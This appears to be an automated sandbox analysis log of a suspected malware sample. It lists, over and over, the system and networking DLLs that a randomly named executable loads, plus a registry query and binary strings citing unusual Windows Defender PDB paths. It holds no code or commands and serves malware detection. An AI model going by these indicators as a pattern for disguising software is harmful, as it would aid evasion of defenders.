Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winhttp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: mswsock.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winnsi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: rasadhlp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: urlmon.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: srvcli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winhttp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: mswsock.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winnsi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: rasadhlp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: urlmon.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: srvcli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winhttp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: mswsock.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winnsi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: rasadhlp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: urlmon.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: srvcli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winhttp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: mswsock.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winnsi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: rasadhlp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: urlmon.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: srvcli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winhttp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: mswsock.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winnsi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: rasadhlp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: urlmon.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: srvcli.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}\InprocServer32Jump to behavior
Source: uavINoSIQh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wkernel32.pdb source: svchost.exe, 00000002.00000002.2623341947.0000000008A23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\wntdll.pdb source: svchost.exe, 00000002.00000002.2623341947.0000000008A23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\DLL\wkernel32.pdb source: svchost.exe, 00000002.00000002.2626765439.0000000008B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winsta.pdb source: svchost.exe, 00000002.00000002.2620449428.0000000004493000.00000004.00000020.00020000.00000000.sdmp
